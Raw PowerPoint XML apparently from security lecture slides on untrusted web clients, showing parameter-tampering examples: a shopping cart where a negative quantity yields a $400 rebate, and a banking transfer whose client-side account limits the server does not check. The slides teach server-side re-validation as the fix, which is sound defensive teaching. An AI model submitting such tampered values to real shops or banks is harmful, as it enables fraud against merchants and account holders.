              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD030F6-0D87-8348-B627-3C47A47EA0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8867772" y="3451225"/>
            <a:ext cx="692150" cy="39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FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8BD747-5E2A-5E42-9901-3B6F5CE29591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8177210" y="3451225"/>
            <a:ext cx="1244600" cy="692150"/>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42445E5D-623B-E542-BABE-08244D0173F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2122488" y="2102156"/>
            <a:ext cx="4768850" cy="338772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5B8513C4-9218-EA44-8367-DC1373158809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6762747" y="4454525"/>
            <a:ext cx="1797050" cy="82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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>send inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{781B4457-A751-6841-9EF0-4BF868D90A0A}"/>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229717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P spid="13"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A81B28F3-4CD3-AA40-9B2F-8BBB38398903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1236649" y="1906499"/>
            <a:ext cx="4287847" cy="4146727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111619" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200F40E7-374B-8C49-B9B6-C270F46220A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Problem: Client Is Untrusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5497780-01C9-D043-9226-63A0AAD69711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1379836" y="2693773"/>
            <a:ext cx="760413" cy="582827"/>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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{467516A7-9CBA-6F41-B537-75BD4692774D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="8" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2140249" y="2985187"/>
            <a:ext cx="4649787" cy="1205814"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0603A90D-29C7-A840-B32D-7E07EC1BA9E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6772573" y="4006851"/>
            <a:ext cx="24111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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Previously rejected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>values sent to server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF97FFD8-F49E-7743-A0E3-685F7C22A3F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6772574" y="4989513"/>
            <a:ext cx="26452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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Inputs must be re-validated at server!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51D6036-F619-2F4C-9DD6-E9C173447691}"/>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1761374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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB67406C-E98C-3B4A-AD79-A90F12227DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Online Shopping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2861CED9-A941-4445-8EBE-9F0EC8635A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243014" y="4841368"/>
            <a:ext cx="6201032" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">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Vulnerability: malicious client submits negative quantities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	         for unlimited shopping rebates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113670" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9239BBB0-8E93-D44E-9BB6-E219EE453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4" y="1783558"/>
            <a:ext cx="34544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A1240BD2-5EDC-5D49-BBE0-AB3CD3E9A820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752977" y="1907128"/>
            <a:ext cx="4713287" cy="2238192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82945" tIns="41473" rIns="82945" bIns="41473">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-side constraints: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     quantity1 ≥ 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     quantity2 ≥ 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-side code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     total  =  quantity1 * price1 + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                  quantity2 * price2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B796AE53-FEF5-8D49-91AC-6A3E9AEC6F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243014" y="2312195"/>
            <a:ext cx="830263" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Brace 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E3F6BB-B117-0D4B-A30A-3ADBCEC7A87F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4894263" y="2312196"/>
            <a:ext cx="261938" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8339"/>
              <a:gd name="adj2" fmla="val 50000"/>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pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB860F77-F051-CC42-96D5-0E5264CC22E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="22" idx="6"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2073277" y="2553495"/>
            <a:ext cx="2820987" cy="33338"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E248ACDE-33B9-4549-B2AB-8426ECD6346F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1165314" y="5646371"/>
            <a:ext cx="74959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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Two items in cart: price1 = $100, price2 = $500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>quantity1 = -4, quantity2 = 1, total = $100 (rebate of $400 on price2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB649C4-D60E-CC48-AA5F-A0556E1FBBF0}"/>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3963820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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>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9E49EAF7-9CF1-414A-A822-4F04C1286C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Online Banking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112645" name="Picture 3" descr="CU.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A1897E-E69F-F945-88B4-FB18B46AE8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267" y="2013294"/>
            <a:ext cx="4060825"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CBE4A76-E06B-714D-8720-FDCE3A632E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119818" y="2354822"/>
            <a:ext cx="4230688" cy="1930415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82945" tIns="41473" rIns="82945" bIns="41473">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-side constraints: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IN (Accnt1, Accnt2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IN (Accnt1, Accnt2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-side code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transfer money </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC82F85-D1A6-B24D-A90C-7756E06A727C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
